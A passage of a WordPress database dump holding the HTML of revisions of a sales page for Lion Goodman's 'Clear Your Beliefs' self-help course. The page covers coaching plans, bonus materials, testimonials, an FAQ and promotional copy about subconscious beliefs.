are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 20:48:16', '2014-06-18 01:48:16', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(991, 2, '2014-06-17 20:49:43', '2014-06-18 01:49:43', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into 